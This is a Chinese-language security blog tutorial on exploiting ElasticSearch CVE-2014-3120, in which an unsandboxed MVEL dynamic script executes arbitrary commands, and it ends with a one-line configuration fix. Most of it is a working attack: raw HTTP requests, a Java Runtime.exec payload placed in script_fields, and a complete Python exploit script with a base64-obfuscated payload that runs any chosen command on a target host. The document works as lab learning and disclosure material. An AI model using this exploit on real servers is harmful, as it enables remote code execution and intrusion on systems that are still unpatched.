ElasticSearch命令执行漏洞（CVE-2014-3120）

注：今后继续定期更新---“实战”！

Step1：环境搭建

环境搭建这部分略过，今后所有的环境我都会放到公网，感兴趣的朋友可以直接玩。

新环境

这里是三个漏洞 Tomcat 弱口令 、 Tomcat put 上传 、ElasticSearch 命令执行；

Step2：Tomcat put 上传漏洞

• 首先，通过前两个漏洞拿到shell后执行命令
  /root/elasticsearch/bin/elasticsearch -d
• 点击传送门进入漏洞地址 http://xxx.xxx.xxx.xxx/

image.png

• 漏洞形成原因

老版本的ElasticSearch 支持传入动态脚本（MVEL）来执行一些复杂的操作，而MVEL可执行Java代码，而且没有沙盒，所以我们可以直接执行任意代码。

• 漏洞利用
  1、在利用该漏洞的时候需要es中至少存在一条数据，我们先创建一条数据
  如图所示：

POST /website/blog/ HTTP/1.1
Host: bug1024
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qsh24k6luv75cerk1q8nseef97
Connection: close
Content-Length: 28

{
    name:"www.bug1024.cn"
}

状态201表示写入成功：

image.png

2、发送如下Payload数据，执行任意命令：

POST /_search?pretty  HTTP/1.1
Host: bug1024
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=qsh24k6luv75cerk1q8nseef97
Connection: close
Content-Length: 362

{
    "size": 1,
     "query": {
       "filtered": {
        "query": {
           "match_all": {
          }
         }
      }
    },
    "script_fields": {
        "command": {
            "script": "import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\"id \").getInputStream()).useDelimiter(\"\\\\A\").next();"
        }
    }
 }

可以看到命令执行成功：

image.png

3、编写exp脚本(初学python，大佬勿喷)：

#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author：iChina
#date:2019.3.7
#

import argparse
import requests
import base64
import json

parser = argparse.ArgumentParser(description="es_CVE-2014-3120.py -u target -p port -c cmd")
parser.add_argument('-u','--target',metavar="",default="http://www.bug1024.cn",help="The target site or ip")
parser.add_argument('-p','--port',metavar="",default="19200",help="Destination port")
parser.add_argument('-c','--cmd',metavar="",default="whoami",help="Enter the command you want to execute")
args = parser.parse_args()
url = args.target
port = args.port
cmd = args.cmd
def header():
    headers = {
        "User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36",
        "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        "Accept-Encoding":"gzip, deflate",
        "Accept-Language":"zh-CN,zh;q=0.9"
    }
    return headers

def Create_data(url,port):
    url_create_data = url + ":" + port + "/website/blog/"
    headers=header()
    create_data = 'CiAgICB7CiAgICAgICAgbmFtZToiaUNoaW5hIgogICAgfQogICAg'
    data = base64.b64decode(create_data)
    response = requests.post(url_create_data,data,headers=headers)
    code = response.status_code
    if code==201:
        print 'Data created successfully \r\n'
    else:
        print code

def payload(url,port,cmd):
    url_payload = url + ":" + port + "/_search?pretty"
    headers=header()
    str_1 = 'CiAgICB7CiAgICAgICAgInNpemUiOiAxLAogICAgICAgICJxdWVyeSI6IHsKICAgICAgICAiZmlsdGVyZWQiOiB7CiAgICAgICAgICAgICJxdWVyeSI6IHsKICAgICAgICAgICAgIm1hdGNoX2FsbCI6IHsKICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIH0sCiAgICAgICAgInNjcmlwdF9maWVsZHMiOiB7CiAgICAgICAgICAgICJjb21tYW5kIjogewogICAgICAgICAgICAgICAgInNjcmlwdCI6ICJpbXBvcnQgamF2YS5pby4qO25ldyBqYXZhLnV0aWwuU2Nhbm5lcihSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKFwi'
    str_one = base64.b64decode(str_1)
    str_2 = 'XCIpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcihcIlxcXFxBXCIpLm5leHQoKTsiCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICB9CiAgICA='
    str_two = base64.b64decode(str_2)
    data =str_one  + cmd + str_two
    response = requests.post(url_payload,data,headers=headers)
    return_value = response.text
    value = json.loads(return_value)
    try:
        value = value['hits']['hits'][0]['fields']['command'][0]
        print value
    except:
        print 'Write to successful'
    
def main():
    Create_data(url,port)
    payload(url,port,cmd)

if __name__ == '__main__':
        main()

测试exp:

image.png

Step3：修复建议

• 关掉执行脚本功能，在配置文件elasticsearch.yml里为每一个结点都加上：

    script.disable_dynamic: true

image.png

END

由于小编也在学习中，写的不好各位勿喷。
从0到1学习网络安全 【目录】

实战靶场环境迁移：

https://mp.weixin.qq.com/s/5Nat58sq85CmnW-kWXAOsw